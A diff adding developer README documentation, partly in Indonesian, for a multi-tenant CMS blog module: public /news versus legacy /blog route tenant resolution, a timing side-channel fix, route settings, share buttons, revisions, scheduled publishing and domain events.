+**The only actual difference**: tenant resolution.
+`/blog/{tenantCode}/...` resolves the tenant from the `tenantCode` path
+segment via `resolvePublicTenantByCode` (ADR-0009); `/news/...` has no
+`tenantCode` segment at all and instead resolves via
+`resolvePublicTenantFromRequest` (Issue #559,
+`src/lib/tenant/public-host-tenant-resolver.ts`) — a request `Host`
+header/domain-mapping lookup with an env/setup-state fallback chain (see
+the tenant-domain-routing skill for the full resolution order and the
+`tenant_code_legacy` mode decision made in this issue).
+
+### `withNewsTenant` — shared tenant resolution + module-disabled + route-mode gate
+
+`src/modules/blog-content/application/public-news-tenant-resolution.ts`'s
+`withNewsTenant(sql, request, handler, env?)` centralizes what all seven
+routes need before touching a single post row:
+
+1. Builds `PublicHostResolverConfig` from `process.env.PUBLIC_TENANT_RESOLUTION_MODE`/
+   `process.env.PUBLIC_TRUST_PROXY` (`buildPublicHostResolverConfigFromEnv`)
+   and calls `resolvePublicTenantFromRequest`. `null` -> the whole helper
+   returns `null`.
+2. **Module-disabled + route-mode gate** (`checkBlogContentAndRouteGate`,
+   private): inside the same `withTenant(...)` transaction,
+   `fetchTenantModuleEntry` (`module-management/application/tenant-module-lifecycle.ts`
+   — the single-module narrowing of the plural `fetchTenantModuleEntries`,
+   added as a security audit follow-up so this anonymous gate reads only
+   `blog_content`'s own row, not every registered module's) confirms
+   `blog_content` is enabled (explicit Issue #560 acceptance criterion),
+   and `fetchEffectivePublicRouteSettings` (Issue
+   #564, `application/public-route-settings.ts`) confirms the tenant's
+   effective `publicRouteMode` is not `"disabled"`. Either failing -> the
+   helper returns `null` — indistinguishable from every other non-resolving
+   case from the caller's side.
+
+On success, `handler` also receives the tenant's `EffectivePublicRouteSettings`
+as a third argument (Issue #564) — `publicBasePath`/`publicLabel` for
+self-referential link generation, `rssEnabled`/`sitemapEnabled` so
+`feed.xml`/`sitemap-news.xml` don't need a second lookup (see §Public
+route settings below for where each field actually lives).
+
+Every route then does `const result = await withNewsTenant(sql, request,
+async (tx, tenant, routeSettings) => { ...; return new Response(...); });
+return result ?? notFoundHtmlResponse();` (or `notFoundXmlResponse()` for
+the two XML routes) — a `handler` that finds no matching post/term also
+just `return null`, collapsing into the identical generic 404 as the
+tenant/module/route-mode gate.
+
+**Timing side-channel fix (landed alongside Issue #562)**: "tenant not
+resolved" and "tenant resolved but `blog_content` disabled" both return the
+identical `null`/404, but used to cost a different number of DB round trips
+(the first touched no transaction at all, the second opened `withTenant` +
+one module-enabled lookup query) — an external prober varying the
+`Host` header could have learned "this hostname maps to a real, active
+tenant" purely from response latency once Issue #562's API let
+`awcms_tenant_domains` hold real mappings. Fixed by
+`padUnresolvedTenantLatency()`: the "not resolved" branch now pays the same
+round-trip shape via a harmless padding query scoped to the all-zero
+fail-closed sentinel tenant id (migration 013), which always matches zero
+rows. See `public-news-tenant-resolution.ts`'s own docblock and skill
+`awcms-tenant-domain-routing` §Rute publik `/news` for the full
+writeup, including the deliberate trade-off this adds for
+`tenant_code_legacy` mode (a small, constant DB dependency it did not
+previously have). Issue #564 extended the gate (added the route-mode
+check above) without reopening this fix — see §Public route settings
+below, "Timing parity preserved", for how.
+
+**Known pre-existing gap, deliberately not retrofitted here**:
+`/blog/{tenantCode}` (Issue #540) has **no** module-disabled check at all —
+a tenant that disables `blog_content` via
+`POST /api/v1/tenant/modules/blog_content/disable` can still be browsed
+publicly through `/blog/{tenantCode}`. Out of this issue's explicit scope
+("Rebuilding blog-content internals" is listed as out of scope); flagged
+here as a good candidate for a small follow-up issue instead (reuse
+`withNewsTenant`'s module-disabled pattern, or extract a shared
+`withTenantModuleGate` if that retrofit is ever done for more than one
+legacy route).
+
+### Rendering helper extended, not duplicated
+
+`public-page-rendering.ts`'s `renderPostSummaryListHtml(tenantCode, ...)`
+now delegates to a new, more general
+`renderPostSummaryListHtmlAtBasePath(basePath, ...)` (`basePath =
+/blog/{tenantCode}` for the old wrapper, `/news` for these routes) — a pure
+extraction, byte-for-byte identical output for every existing
+`/blog/{tenantCode}` call site (verified: `escapeHtml` applied to the whole
+base-path string produces the same escaped characters as escaping the
+tenant code alone, regardless of the literal `/blog/` slashes around it).
+`renderPaginationNavHtml` was already generic (takes `basePath` directly) —
+no change needed there.
+
+### Canonical URL / feed / sitemap base path
+
+All literal `/news` (not a consumer of `PUBLIC_CANONICAL_BASE_PATH` —
+that var has been validated since Issue #556 but is not consumed by any
+code yet; `/news` here is a fixed file-routing path, not an
+env-configurable base path). `seo-rendering.ts`'s `resolveCanonicalUrl` is
+unchanged — only the `selfUrl` each route passes in differs
+(`${url.origin}/news/{slug}` instead of `${url.origin}/blog/{tenantCode}/{slug}`).
+
+Test: `tests/integration/blog-content-public-news.integration.test.ts` —
+every acceptance criterion (listing/detail visibility across all
+statuses, unlisted-reachable-by-direct-link, canonical URL under `/news`,
+feed/sitemap links under `/news`, module-disabled 404, `tenant_code_legacy`
+404, cross-tenant isolation).
+
+### Public social share buttons + expanded OG/Twitter metadata — Issue #642 (epic `news_portal`)
+
+Both post detail routes (`/news/{slug}`, `/blog/{tenantCode}/{slug}`) now
+render a public share widget (native Web Share API, copy-link, WhatsApp,
+Telegram, Facebook, LinkedIn, X, email) and expanded Open Graph/Twitter
+Card metadata. New pure modules:
+`domain/social-share-links.ts` (`buildSocialShareLinks` — six-platform
+fixed allowlist, every URL `encodeURIComponent`-encoded;
+`renderSocialShareButtonsHtml` — full widget markup) and
+`src/modules/news-portal/domain/news-share-config.ts`
+(`resolveNewsShareConfig` — per-platform `NEWS_SHARE_*_ENABLED` env
+flags, all defaulting `true`; see that file's header comment for why this
+deviates from this repo's usual "opt-in, default off" feature-flag
+convention). See `.claude/skills/awcms-news-portal/SKILL.md` §642 for
+the full design rationale (Instagram has no supported web-share URL so
+never gets a dedicated button; the canonical URL — never the request's
+raw querystring — is the only URL ever shared; the native-share/copy-link
+client script is a same-origin static file, `public/js/news-share.js`,
+never inline, so it adds zero Content-Security-Policy surface).
+
+`public-page-rendering.ts`'s `renderPublicPageShell` now also emits
+`og:title`/`og:description`/`og:url`/`og:site_name` (derived from the same
+`title`/`description`/`canonicalUrl` fields it already renders as
+`<title>`/`<meta name="description">`/`<link rel="canonical">` — one
+source of truth, `siteName` new and optional from
+`PublicTenantResolution.tenantName`) and `twitter:title`/
+`twitter:description`/`twitter:card` (now always present — `summary`
+without an image, `summary_large_image` with one). `og:image`/
+`twitter:image`/`og:image:alt` are unchanged from Issue #636 (still gated
+on a verified R2 media object).
+
+Test: `tests/unit/social-share-links.test.ts`, `tests/unit/news-share-config.test.ts`,
+`tests/unit/news-share-client-script.test.ts`,
+`tests/integration/news-portal-share-buttons.integration.test.ts` (real
+`/news/{slug}`/`/blog/{tenantCode}/{slug}` routes — default-enabled
+widget, master-switch/per-platform disable, draft never renders it,
+canonical URL used even when the request URL carries tracking
+querystring parameters).
+
+## `/news` (default) vs `/blog/{tenantCode}` (legacy) — Issue #561
+
+Two public route families exist side by side, and neither is going away.
+Pick per-deployment via `PUBLIC_TENANT_RESOLUTION_MODE`
+(`docs/awcms/18_configuration_env_reference.md` §Public routing,
+`docs/adr/0010-public-host-tenant-routing.md`) — this is a **config
+choice**, not a code choice; both route families always exist in every
+build.
+
+| Route                | Status                                             | Tenant resolution                                                                                                                                 | Use when                                                                                                                                                     |
+| -------------------- | -------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------ |
+| `/news`              | **Default for online/public**                      | Request `Host`/domain mapping (Issue #559, mode `host_default`), with env/setup-state fallback — see §Resolver in the tenant-domain-routing skill | Online/public/SaaS deployment with a real domain: clean, SEO-friendly, tenant-implicit URLs (no tenant code in the path)                                     |
+| `/blog/{tenantCode}` | **Legacy, explicit-tenant, still fully supported** | `tenantCode` path segment (ADR-0009), resolved directly, independent of `PUBLIC_TENANT_RESOLUTION_MODE`                                           | Offline/LAN-first deployment (doc 18) with no public domain/DNS/TLS at all, or any deployment that wants an explicit, unambiguous tenant selector in the URL |
+
+Both route families reuse the exact same application/domain services
+(`public-blog-directory.ts`, `public-page-rendering.ts`, `seo-rendering.ts`,
+`content-block-rendering.ts`, `blog-search.ts`'s `searchPublicBlogContent`)
+— see §Public routes `/news` (Issue #560) above, "The only actual
+difference". Neither family redirects to the other and there is no plan to
+retire `/blog/{tenantCode}` — see `docs/adr/0010-public-host-tenant-routing.md`
+§Konsekuensi and the `awcms-tenant-domain-routing` skill's "aturan
+lintas-issue" #3. `/news` examples in this README never include a
+`tenantCode` segment — that is the whole point of the route (tenant is
+resolved from the request, not the path).
+
+## Public route settings (Issue #564, epic #555)
+
+`application/public-route-settings.ts`'s `fetchEffectivePublicRouteSettings(tx, tenantId, env?)`
+computes one merged, read-only DTO for `/news`/`/blog/{tenantCode}` route
+handlers, sourced from **two** existing, already-authoritative stores —
+deliberately not a third one:
+
+| Field                      | Store                                                                                                                                                    | Write path                                           |
+| -------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------- |
+| `publicRouteMode`          | `blog_content` module descriptor `settings.defaults` + `awcms_module_settings` tenant override (generic tenant-settings framework, Issue #516/epic #510) | `PATCH /api/v1/tenant/modules/blog_content/settings` |
+| `publicBasePath`           | same as above                                                                                                                                            | same as above                                        |
+| `legacyTenantRouteEnabled` | same as above                                                                                                                                            | same as above                                        |
+| `publicLabel`              | same as above                                                                                                                                            | same as above                                        |
+| `rssEnabled`               | `awcms_blog_settings` (Issue #537, wired up Issue #543) — **unchanged**                                                                                  | `PATCH /api/v1/blog/settings`                        |
+| `sitemapEnabled`           | `awcms_blog_settings` — **unchanged**                                                                                                                    | `PATCH /api/v1/blog/settings`                        |
+
+### Why `rssEnabled`/`sitemapEnabled` are NOT in the new descriptor defaults
+
+Issue #564's own suggested example JSON lists `rssEnabled`/`sitemapEnabled`
+alongside the four genuinely new keys. They are **deliberately excluded**
+from `module.ts`'s `settings.defaults` here. Those two flags already
+existed and already worked before this issue (Issue #537 defined the
+column, Issue #543 wired up `PATCH /api/v1/blog/settings`, Issue #540/#560
+made `/blog/{tenantCode}/feed.xml`/`sitemap-blog.xml` and
+`/news/feed.xml`/`sitemap-news.xml` enforce them). Adding a _second_,
+independently-writable copy of the same concept into
+`awcms_module_settings` would create two disconnected sources of
+truth: an admin could flip "RSS enabled" off in the generic
+`/admin/modules/blog_content` settings panel while the feed route keeps
+reading the OLD `awcms_blog_settings` value and stays enabled — a
+real correctness bug, not a stylistic preference. `fetchEffectivePublicRouteSettings`
+proves this is enforced, not just documented:
+`tests/integration/blog-content-settings.integration.test.ts`'s "writing
+those exact key names into the new module-settings store has NO effect on
+/news/feed.xml or /news/sitemap-news.xml" test PATCHes `rssEnabled: false`
+into the wrong store and confirms the feed stays enabled, then flips it
+through the correct store and confirms it actually disables.
+
+### `publicRouteMode` — `/news` only, `domain_default` = unchanged behavior
+
+`"domain_default"` (the default) means "behave exactly as before this
+issue" — `/news` resolves the tenant per `PUBLIC_TENANT_RESOLUTION_MODE`
+(doc 18) unchanged. `"disabled"` is the one new value: `withNewsTenant`
+(`application/public-news-tenant-resolution.ts`) now also checks this
+after confirming `blog_content` is enabled, and returns the same generic
+`null` (-> identical 404) an unresolved tenant or a disabled module already
+produce. Scoped to `/news` only — it does **not** gate `/blog/{tenantCode}`,
+which has its own, independent switch (`legacyTenantRouteEnabled`, below).
+This scoping is deliberate: the two route families are independent
+(§`/news` vs `/blog/{tenantCode}` above), so their kill switches are too.
+
+**Timing parity preserved.** `withNewsTenant`'s module-disabled gate
+already had a timing side-channel fix (Issue #562's
+`padUnresolvedTenantLatency`, closing the "does this hostname map to a
+real tenant" latency leak). Adding a second condition (`publicRouteMode`)
+to the same branch risked reopening it if the new check's query cost
+weren't paid on every outcome uniformly. Fixed by factoring the whole gate
+(`fetchTenantModuleEntry` + `fetchEffectivePublicRouteSettings`) into one
+private `checkBlogContentAndRouteGate` function that both the real
+resolved-tenant branch **and** `padUnresolvedTenantLatency` call — they can
+never drift apart because they're the same function call, not
+hand-duplicated query sequences. `tests/integration/blog-content-public-news.integration.test.ts`'s
+three round-trip-parity tests were updated accordingly (same equality
+assertions, now covering the extra query).
+
+### `publicBasePath` — self-referential link generation only, NOT physical routing
+
+Used everywhere `/news` route handlers previously hardcoded the literal
+string `/news` into a **generated URL**: canonical `<link>`, RSS
+`<link>`/item `<link>`/`<guid>`, sitemap `<loc>`, pagination hrefs,
+category/tag archive links, and the post-summary listing links
+(`renderPostSummaryListHtmlAtBasePath`). Falls back to the
+`PUBLIC_CANONICAL_BASE_PATH` env var (Issue #556 — validated since that
+issue but never consumed by any code until now, a pre-existing gap this
+issue closes) when unset/invalid, then to the hardcoded `/news`.
+
+**Known, deliberate limitation**: this does **not** retarget which Astro
+file route physically serves a request. `/news/**` are Astro file-based
+static routes (`src/pages/news/*`); Astro cannot repoint a static route's
+own served path per-tenant at runtime without a catch-all dynamic segment
+(`src/pages/[...basePath]/...`) — a much larger, riskier restructuring
+that is out of this issue's scope (the issue's own "Update `/news` route
+handlers ... where appropriate" wording reads as a soft/partial-application
+instruction, not a routing rebuild). Practical consequence: setting
+`publicBasePath` to anything other than `/news` produces self-referential
+links that point at a path Astro does not actually serve at that prefix —
+acceptable and documented, not silently broken; a tenant that customizes
+this value is expected to also configure their reverse proxy/CDN to route
+that prefix to this app if they want the generated links to actually
+resolve. `tests/integration/blog-content-settings.integration.test.ts`
+proves the acceptance criterion ("`/news` uses `publicBasePath` from
+effective settings") is satisfied exactly this way — generated links
+change, the route handler itself is still reached at `/news/*`.
+
+### `legacyTenantRouteEnabled` — disable (404), not redirect; all 7 routes, consistently
+
+Chosen: `false` makes all 7 `/blog/{tenantCode}` routes (index, detail,
+category, tag, search, feed, sitemap) return the exact same generic 404 an
+unknown `tenantCode` already produces — **not** a redirect to `/news`.
+Reasons: (1) consistency with every other "this feature is turned off"
+outcome in this module, which always collapses to the same generic 404
+(rssEnabled/sitemapEnabled since Issue #543, blog_content-disabled and
+publicRouteMode=disabled on `/news` above) — a redirect would be the only
+inconsistent case; (2) a redirect to `/news` would implicitly assert "this
+tenant is also reachable via host-based resolution," which is not
+necessarily true (the two route families resolve tenants through entirely
+independent mechanisms — §`/news` vs `/blog/{tenantCode}` above); (3) doc
+issue #564's security note ("do not expose disabled reason... to anonymous
+users") is trivially satisfied by reusing the established generic-404
+convention, whereas a redirect target itself could leak information. The
+default (`true`) keeps today's behavior unchanged — ADR-0010 and the
+`awcms-tenant-domain-routing` skill's binding rule #3 both establish
+that the legacy family is never removed by default; this setting is a
+tenant-chosen opt-out, not a code-level deprecation. Implemented via
+`isLegacyTenantRouteEnabled(tx, tenantId)` (a thin wrapper around
+`fetchEffectivePublicRouteSettings`), called identically at the top of the
+`withTenant` callback in all 7 `/blog/{tenantCode}/*.ts` files — no shared
+resolver like `withNewsTenant` exists for the legacy family (each file
+independently calls `resolvePublicTenantByCode`), so the consistency
+guarantee here comes from every file calling the exact same one-line
+helper, not from a single centralized gate function. Deliberately does
+**not** get `withNewsTenant`'s timing-parity treatment — the `tenantCode`
+is already caller-supplied and visible in the URL path itself, so there is
+no "does this identifier map to a real tenant" existence question left to
+protect by response latency (contrast `/news`, which resolves the tenant
+from an opaque `Host` header). This module-disabled check is also still
+absent from `/blog/{tenantCode}` (see §Public routes `/news` above, "Known
+pre-existing gap") — unchanged, out of this issue's scope too.
+
+### `publicLabel` — route-family label, distinct from `blogTitle`
+
+A human-readable label for the `/news` route family (default `"News"`),
+used in generated headings/titles/RSS channel title on `/news` only (not
+`/blog/{tenantCode}`, which keeps its historical hardcoded "Blog" wording —
+`publicLabel` is scoped to the route family this settings group actually
+describes). Genuinely distinct from `awcms_blog_settings.blogTitle`
+(Issue #543): `blogTitle` is SEO-facing content metadata (falls into
+`seoDefaultTitle`'s fallback chain), while `publicLabel` labels the route
+family itself ("News" vs "Blog" vs any other tenant-chosen word) —
+independent of what the tenant names their actual blog/site.
+
+### Secret-shaped key rejection still applies
+
+`PATCH /api/v1/tenant/modules/blog_content/settings` still runs through
+the same `validateModuleSettingsPatch` (`module-management/domain/module-settings.ts`)
+every other module's settings PATCH does — none of the four new key names
+(`publicRouteMode`, `publicBasePath`, `legacyTenantRouteEnabled`,
+`publicLabel`) or their values match any entry in `redaction.ts`'s
+`REDACTION_KEYS` list, confirmed by
+`tests/integration/blog-content-settings.integration.test.ts`'s existing
+secret-shaped-key test (unchanged assertion, now targeting `blog_content`
+instead of `form_drafts`).
+
+## Revisions (Issue #541)
+
+`/api/v1/blog/posts/{id}/revisions` (`src/pages/api/v1/blog/posts/[id]/revisions/`).
+
+```txt
+GET  /api/v1/blog/posts/{id}/revisions                     -> blog_content.revisions.read
+GET  /api/v1/blog/posts/{id}/revisions/{revisionId}         -> blog_content.revisions.read
+POST /api/v1/blog/posts/{id}/revisions/{revisionId}/restore -> blog_content.revisions.restore (Idempotency-Key wajib)
+```
+
+Hanya rute untuk **post** — doc issue #541 §Routes cuma mendaftarkan tiga rute di atas, meski aturan revisi sendiri ("post/page changes") berlaku untuk keduanya. `PATCH /api/v1/blog/pages/{id}` juga memicu `createBlogRevision` dengan `resource_type = 'page'` (baris tersimpan, riwayat terekam), tapi tidak ada rute baca/restore untuk page revision di issue ini — backlog terbuka, lihat §Belum tersedia.
+
+### Kapan revisi baru dibuat — "significant change"
+
+`domain/revision-policy.ts`'s `isSignificantContentChange` — true kalau `PATCH` menyertakan `title`, `contentJson`, atau `contentText`; field lain (`seoTitle`, `metaDescription`, `canonicalUrl`, `visibility`, `locale`, `featuredMediaId`, `slug`, `menuOrder`, ...) tidak memicu revisi baru. `awcms_blog_revisions` tidak punya kolom `slug` (migration 026) — konsisten dengan keputusan itu. Dipanggil dari `PATCH /api/v1/blog/posts/{id}` dan `PATCH /api/v1/blog/pages/{id}`, **bukan** dari `POST` create — revisi pertama baru muncul begitu ada perubahan konten signifikan pertama setelah create, bukan snapshot draft awal.
+
+### Restore — append-only, tidak pernah menimpa
+
+`POST .../revisions/{revisionId}/restore`: (1) ambil konten revisi target, (2) tulis kembali ke baris post yang hidup lewat `updateBlogPost` biasa, (3) `createBlogRevision` lagi untuk mencatat state hasil restore itu sendiri (`changeNote: "Restored from revision {n}."`). Langkah 3 berarti restore **menambah** baris baru di `awcms_blog_revisions`, tidak pernah `UPDATE`/`DELETE` baris manapun yang sudah ada — riwayat lengkap termasuk revisi-revisi "di antara" tetap utuh dan bisa dibaca lagi nanti.
+
+Permission `blog_content.revisions.restore` **eksplisit wajib** — tidak ada ownership override seperti `PATCH /api/v1/blog/posts/{id}` (author pemilik post tidak otomatis boleh restore revisinya sendiri tanpa permission itu; lihat §ABAC di §Admin API — Blog Posts untuk kontras pola). `Idempotency-Key` wajib (scope `blog_revision_restore`) — replay key yang sama mengembalikan response tersimpan tanpa menambah revisi kedua.
+
+Audit: `blog.post.revision_restored` (severity `warning`, `attributes: { revisionId, revisionNumber }`).
+
+## Scheduled publishing (Issue #541, direstrukturisasi Issue #640)
+
+`bun run blog:publish:scheduled` (`scripts/blog-scheduled-publish.ts`) — worker internal, bukan endpoint HTTP, dijadwalkan cron/systemd timer (pola sama `scripts/form-draft-purge.ts`). Untuk setiap tenant aktif, memanggil `blog-scheduled-publish.ts`'s `publishDueScheduledPosts(sql, tenantId, mediaPort, options?)`.
+
+**Issue #640 mengubah signature** (`mediaPort: NewsMediaPort` sekarang parameter wajib, disuntik `scripts/blog-scheduled-publish.ts` sebagai composition root — pola port yang sama ADR-0011 tetapkan) **dan** merestrukturisasi dari satu `UPDATE` set-based per tenant menjadi `SELECT ... FOR UPDATE` diikuti loop per-post:
+
+```sql
+SELECT id, slug, title, excerpt, content_json, content_text,
+       featured_media_id, meta_description
+FROM awcms_blog_posts
+WHERE tenant_id = $1 AND status = 'scheduled'
+  AND scheduled_at IS NOT NULL AND scheduled_at <= now() AND deleted_at IS NULL
+FOR UPDATE
+```
+
+Setiap post due dievaluasi lewat `content-quality-checklist-gate.ts`'s `evaluateContentQualityChecklistForContent` (lihat `.claude/skills/awcms-news-portal/SKILL.md` §640) sebelum ditransisikan — kalau checklist gagal (blocking rule, hanya relevan bila tenant mengaktifkan mode full-online R2-only), post itu **dibiarkan `scheduled`** (bukan silently published, bukan di-unschedule) dan diaudit `blog.post.scheduled_publish_blocked`; job lanjut ke post due berikutnya. Post yang lolos baru di-`UPDATE` satu-per-satu ke `published`. Alasan restrukturisasi: tanpa ini, tenant bisa bypass checklist sepenuhnya dengan men-schedule post SEBELUM mengaktifkan mode R2-only (atau sebelum sebuah media diverifikasi ulang), lalu menunggu due — celah kelas yang sama dengan Issue #636's revision-restore bypass. `FOR UPDATE` menjaga job ini tetap aman terhadap dua run konkuren (mis. dua worker instance) untuk tenant yang sama.
+
+Idempoten by construction: post yang sudah `published`, `scheduled_at`-nya masih di masa depan, atau ditinggalkan `scheduled` karena checklist gagal sebelumnya tidak menghasilkan efek baru pada run berikutnya di `now` yang sama. `COALESCE(published_at, now())` memastikan post yang **pernah** published sebelumnya (`published_at` sudah terisi dari histori lama, lalu di-set balik ke `draft`/`scheduled` lewat SQL manual atau endpoint masa depan) tidak kehilangan `published_at` aslinya — doc issue #541 §Scheduled Publishing Rules: "sets published_at=now() only if not already set".
+
+Audit per post yang dipublish: `blog.post.published` (reuse action yang sama dengan `POST .../publish` manual — pembeda `trigger: "scheduled_publish"` hanya ada di structured log, bukan di audit `attributes`). Plus satu event ringkasan per pemanggilan tenant: `blog.post.scheduled_publish_executed` (`attributes.publishedCount`/`blockedCount`) atau `blog.post.scheduled_publish_skipped` (kalau tidak ada yang due sama sekali).
+
+Tidak ada pemanggilan provider eksternal sama sekali di job ini (ADR-0006 tidak relevan di sini — job murni transisi database, tidak ada dispatcher/provider yang perlu dijaga di luar transaction). `mediaPort` bukan provider eksternal — implementasinya (`newsMediaPortAdapter`) hanya membaca dari Postgres yang sama, bukan Cloudflare R2.
+
+## Domain events (AsyncAPI, Issue #541, diperluas Issue #542)
+
+`asyncapi/awcms-domain-events.asyncapi.yaml` — 26 channel untuk `blog_content` (13 dari Issue #541 + 13 dari Issue #542), terdaftar juga di `module.ts`'s `events.publishes` (divalidasi `scripts/api-spec-check.ts`'s `checkModuleEventChannels`: tiap entry `publishes` module manapun wajib punya channel AsyncAPI yang cocok). Sama seperti setiap event lain di kontrak ini sejak Issue 0.3: **dokumentasi kontrak saja** — tidak ada dispatcher pub/sub nyata di repo ini; produser sebenarnya adalah structured JSON logger (`src/lib/logging/logger.ts`'s `log()`), bukan event bus. Konvensi penamaan log line: buang prefix `awcms.` dari event type (`awcms.blog-content.post.published` -> log message `blog-content.post.published`) — pola sama persis `email.message.queued` dkk.
+
+Ke-26 event punya produser nyata di kode saat ini (Issue #543 menutup satu-satunya celah yang tersisa, `settings.updated`):
+
+| Event (AsyncAPI channel, tanpa prefix `awcms.`)       | Log line diemisikan dari                                                                                                                                                                                         |
+| ----------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
+| `blog-content.post.created`                           | `pages/api/v1/blog/posts/index.ts` (`POST`)                                                                                                                                                                      |
+| `blog-content.post.updated`                           | `pages/api/v1/blog/posts/[id].ts` (`PATCH`)                                                                                                                                                                      |
+| `blog-content.post.submitted-for-review`              | `pages/api/v1/blog/posts/[id]/submit-review.ts`                                                                                                                                                                  |
+| `blog-content.post.published`                         | `pages/api/v1/blog/posts/[id]/publish.ts` **dan** `blog-content/application/blog-scheduled-publish.ts` (atribut `trigger` membedakan)                                                                            |
+| `blog-content.post.scheduled`                         | `pages/api/v1/blog/posts/[id]/schedule.ts`                                                                                                                                                                       |
+| `blog-content.post.archived`                          | `pages/api/v1/blog/posts/[id]/archive.ts`                                                                                                                                                                        |
+| `blog-content.post.deleted`                           | `pages/api/v1/blog/posts/[id].ts` (`DELETE`)                                                                                                                                                                     |
+| `blog-content.post.restored`                          | `pages/api/v1/blog/posts/[id]/restore.ts` (restore soft-delete, **bukan** restore revisi)                                                                                                                        |
+| `blog-content.post.purged`                            | `pages/api/v1/blog/posts/[id]/purge.ts`                                                                                                                                                                          |
+| `blog-content.revision.created`                       | `blog-content/application/blog-revision-directory.ts`'s `createBlogRevision` — satu titik untuk PATCH signifikan **dan** restore revisi, jadi log line-nya otomatis muncul dari kedua jalur tanpa duplikasi kode |
+| `blog-content.term.created`                           | `pages/api/v1/blog/terms/index.ts` (`POST`)                                                                                                                                                                      |
+| `blog-content.term.updated`                           | `pages/api/v1/blog/terms/[id].ts` (`PATCH`)                                                                                                                                                                      |
+| `blog-content.template.created`/`.updated`/`.deleted` | `pages/api/v1/blog/templates/index.ts` (`POST`), `[id].ts` (`PATCH`/`DELETE`)                                                                                                                                    |
+| `blog-content.menu.created`/`.updated`/`.deleted`     | `pages/api/v1/blog/menus/index.ts` (`POST`), `[id].ts` (`PATCH`/`DELETE`)                                                                                                                                        |
+| `blog-content.widget.created`/`.updated`/`.deleted`   | `pages/api/v1/blog/widgets/index.ts` (`POST`), `[id].ts` (`PATCH`/`DELETE`)                                                                                                                                      |
+| `blog-content.ad.created`/`.updated`/`.deleted`       | `pages/api/v1/blog/ads/index.ts` (`POST`), `[id].ts` (`PATCH`/`DELETE`)                                                                                                                                          |
+| `blog-content.theme.updated`                          | `pages/api/v1/blog/theme/index.ts` (`PATCH`) — **beda** dari `settings.updated` di bawah, ini tegas tentang `awcms_blog_theme_settings`, bukan `awcms_blog_settings`                                             |
+| `blog-content.settings.updated`                       | `pages/api/v1/blog/settings/index.ts` (`PATCH`, Issue #543) — tentang `awcms_blog_settings`                                                                                                                      |
+
+`checkModuleEventChannels` hanya memvalidasi arah module.ts→AsyncAPI (setiap `publishes` wajib ada channel), bukan sebaliknya — jadi sebelum Issue #543, channel `settings.updated` tanpa produser tidak sempat membuat `api:spec:check` gagal.
+
+## Presentation extensions (Issue #542)
+
+Doc issue #542 sendiri berjudul "Templates, Menus, Widgets, Media/Gallery, Multilingual, Theme Mode, and Ads" dengan §Suggested Files/§Suggested Database Additions/§Suggested Routes eksplisit berlabel **"Suggested"** (beda dari §Routes literal di issue #537-#541) — jadi implementasi ini punya keleluasaan lebih untuk memilih pendekatan paling konsisten dengan arsitektur yang sudah ada, selama Acceptance Criteria tetap terpenuhi. §Important Scope Control issue ini eksplisit: jangan bangun ulang base media library, base tenant system, base RBAC/ABAC, base audit, atau base theme engine.
+
+### Templates, Menus, Widgets, Ads — CRUD penuh
+
+Empat resource ini dibangun sebagai admin CRUD nyata (bukan lightweight), karena masing-masing eksplisit punya §Suggested Routes sendiri di issue dan butuh guard/audit/RLS lengkap:
+
+```txt
+GET    /api/v1/blog/templates          -> blog_content.templates.read
+POST   /api/v1/blog/templates          -> blog_content.templates.configure
+PATCH  /api/v1/blog/templates/{id}     -> blog_content.templates.configure
+DELETE /api/v1/blog/templates/{id}     -> blog_content.templates.configure
+
+GET    /api/v1/blog/menus              -> blog_content.menus.read
+POST   /api/v1/blog/menus              -> blog_content.menus.configure
+PATCH  /api/v1/blog/menus/{id}         -> blog_content.menus.configure
+DELETE /api/v1/blog/menus/{id}         -> blog_content.menus.configure
+
+GET    /api/v1/blog/widgets            -> blog_content.widgets.read
+POST   /api/v1/blog/widgets            -> blog_content.widgets.configure
+PATCH  /api/v1/blog/widgets/{id}       -> blog_content.widgets.configure
+DELETE /api/v1/blog/widgets/{id}       -> blog_content.widgets.configure
+
+GET    /api/v1/blog/ads                -> blog_content.ads.read
+POST   /api/v1/blog/ads                -> blog_content.ads.configure
+PATCH  /api/v1/blog/ads/{id}           -> blog_content.ads.configure
+DELETE /api/v1/blog/ads/{id}           -> blog_content.ads.configure
+```
+
+Satu permission `configure` menggerbangi create/update/delete sekaligus (pola sama seperti `blog_content.taxonomies.configure`) — bukan permission per-aksi seperti posts (`.publish`/`.schedule`/dst) karena resource ini adalah master/config data admin, bukan konten dengan lifecycle status. Tidak ada ownership override ABAC — `configure` selalu dicek murni via `authorizeInTransaction`.
+
+### Menus — hierarki satu level, `id` wajib client-supplied
+
+`POST`/`PATCH .../menus(/{id})` menerima `items?: MenuItemEntryInput[]` — **full replace** (delete semua item lama, insert set baru), sama seperti `termIds` di payload post. Karena full-replace berarti id lama sudah hilang di saat baris baru di-insert, `id` tiap item **wajib disuplai klien** (bukan `gen_random_uuid()` DB) — supaya `parentItemId` di payload yang sama bisa merujuk sibling-nya sendiri tanpa perlu tahu id yang di-generate DB terlebih dulu. `domain/menu-policy.ts`'s `validateMenuItemsInput` memvalidasi: id unik dalam batch, `parentItemId` (kalau ada) wajib merujuk item lain di batch yang sama, dan nesting maksimal satu level (item dengan `parentItemId` yang parent-nya sendiri juga punya parent → ditolak) — batas yang sama seperti kategori/tag di `taxonomy-policy.ts`.
+
+`linkType` (`post|page|url`) menggerbangi field mana yang wajib: `post`/`page` butuh `targetId` (UUID, **tidak** dicek eksistensinya terhadap tabel posts/pages — konsisten dengan `termIds`' pola "shape only, existence check kalau perlu request DB tambahan," yang di sini sengaja dilewati karena menu bisa menunjuk resource yang belum ada saat menu-nya sendiri dibuat), `url` butuh URL http(s) absolut (`isAbsoluteHttpUrl`, sama seperti `canonicalUrl`).
+
+### Widgets — posisi tetap, body plain text
+
+`position` salah satu dari `header|sidebar|footer|content_before|content_after` (constraint DB + `domain/widget-policy.ts`). `bodyText` bukan `content_json` — plain text, direject (bukan disanitasi) kalau mengandung pola HTML tidak aman (`content-validation.ts`'s `containsUnsafeHtml`, baru diekspor issue ini). Rendering publik widget (kalau/ketika dibangun) wajib escape `bodyText`, sama seperti block renderer content_json — belum ada rute publik untuk widget di issue ini.
+
+### Ads — placement targeting + scheduling
+
